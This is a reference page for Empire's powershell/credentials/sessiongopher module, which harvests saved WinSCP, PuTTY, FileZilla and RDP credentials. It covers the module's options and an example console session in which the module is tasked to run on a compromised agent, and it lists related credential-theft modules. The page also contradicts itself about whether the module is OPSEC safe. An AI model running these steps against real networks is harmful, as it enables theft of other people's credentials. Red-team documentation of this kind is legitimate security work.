Invoke-SessionGopher - Empire Module
This page contains detailed information about how to use the powershell/credentials/sessiongopher Empire module. For list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: Invoke-SessionGopher
Module: powershell/credentials/sessiongopher
Source code [1]: empire/server/modules/powershell/credentials/sessiongopher.yaml
Source code [2]: empire/server/data/module_source/credentials/Invoke-SessionGopher.ps1
MITRE ATT&CK:
T1081
Language: PowerShell
Needs admin: No
OPSEC safe: Yes
Background: No
The sessiongopher module extracts saved sessions & passwords for WinSCP, PuTTY, SuperPuTTY, FileZilla, RDP, .ppk files, .rdp files, .sdtid files.
This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.
Note that the sessiongopher module does not need administrative privileges to work properly which means that a normal user can run this module.
Required Module Options
This is a list of options that are required by the sessiongopher module:
Agent
Agent to run module on.
Additional Module Options
This is a list of additional options that are supported by the sessiongopher module:
AllDomain
Switch. Run against all computers on domain. Uses current security context, unless -u and -p arguments provided. Uses WMI.
Target
Provide a single host to run remotely against. Uses WMI.
Thorough
Switch. Searches entire filesystem for .ppk, .rdp, .sdtid files. Not recommended to use with -AllDomain due to time.
iL
Provide path to a .txt file on the remote host containing hosts separated by newlines to run remotely against. Uses WMI.
o
Switch. Drops a folder of all output in .csvs on remote host.
p
Password for user account (if -u argument provided).
u
User account (e.g. corp.com\jerry) for when using -Target, -iL, or -AllDomain. If not provided, uses current security context.
Sessiongopher Example Usage
Here's an example of how to use the sessiongopher module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/credentials/sessiongopher
Author @arvanaghi, created at FireEye
Background False
Comments Twitter: @arvanaghi
https://arvanaghi.com
https://github.com/fireeye/SessionGopher
Description Extract saved sessions & passwords for WinSCP, PuTTY, SuperPuTTY,
FileZilla, RDP, .ppk files, .rdp files, .sdtid files
Language powershell
Name powershell/credentials/sessiongopher
NeedsAdmin False
OpsecSafe True
Techniques http://attack.mitre.org/techniques/T1081
,Record Options-----,----------,-------------------------------------,
| Name | Value | Required | Description |
|-----------|-------|----------|-------------------------------------|
| Agent | | True | Agent to run module on. |
|-----------|-------|----------|-------------------------------------|
| AllDomain | | False | Switch. Run against all computers |
| | | | on domain. Uses current security |
| | | | context, unless -u and -p arguments |
| | | | provided. Uses WMI. |
|-----------|-------|----------|-------------------------------------|
| Target | | False | Provide a single host to run |
| | | | remotely against. Uses WMI. |
|-----------|-------|----------|-------------------------------------|
| Thorough | | False | Switch. Searches entire filesystem |
| | | | for .ppk, .rdp, .sdtid files. Not |
| | | | recommended to use with -AllDomain |
| | | | due to time. |
|-----------|-------|----------|-------------------------------------|
| iL | | False | Provide path to a .txt file on the |
| | | | remote host containing hosts |
| | | | separated by newlines to run |
| | | | remotely against. Uses WMI. |
|-----------|-------|----------|-------------------------------------|
| o | | False | Switch. Drops a folder of all |
| | | | output in .csvs on remote host. |
|-----------|-------|----------|-------------------------------------|
| p | | False | Password for user account (if -u |
| | | | argument provided). |
|-----------|-------|----------|-------------------------------------|
| u | | False | User account (e.g. corp.com\jerry) |
| | | | for when using -Target, -iL, or |
| | | | -AllDomain. If not provided, uses |
| | | | current security context. |
'-----------'-------'----------'-------------------------------------'
(Empire: usemodule/powershell/credentials/sessiongopher) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/credentials/sessiongopher) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come.
Authors
- @arvanaghi
- created at FireEye
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/credentials/sessiongopher.yaml
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/data/module_source/credentials/Invoke-SessionGopher.ps1
- https://arvanaghi.com
- https://github.com/fireeye/SessionGopher
- http://attack.mitre.org/techniques/T1081
See Also
Check also the following modules related to this module:
- powershell/credentials/rubeus
- powershell/credentials/vault_credential
- powershell/credentials/invoke_kerberoast
- powershell/credentials/DomainPasswordSpray
- powershell/credentials/invoke_internal_monologue
- powershell/credentials/powerdump
- powershell/credentials/enum_cred_store
- powershell/credentials/invoke_ntlmextract
- powershell/credentials/get_lapspasswords
- powershell/credentials/sharpsecdump
- powershell/credentials/credential_injection
- powershell/credentials/tokens
- powershell/credentials/mimikatz/pth
- powershell/credentials/mimikatz/silver_ticket
- powershell/credentials/mimikatz/cache
- powershell/credentials/mimikatz/command
- powershell/credentials/mimikatz/terminal_server
- powershell/credentials/mimikatz/extract_tickets
- powershell/credentials/mimikatz/keys
- powershell/credentials/mimikatz/sam
- powershell/credentials/mimikatz/trust_keys
- powershell/credentials/mimikatz/purge
- powershell/credentials/mimikatz/logonpasswords
- powershell/credentials/mimikatz/certs
- powershell/credentials/mimikatz/dcsync
- powershell/credentials/mimikatz/lsadump
- powershell/credentials/mimikatz/mimitokens
- powershell/credentials/mimikatz/golden_ticket
- powershell/credentials/mimikatz/dcsync_hashdump
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.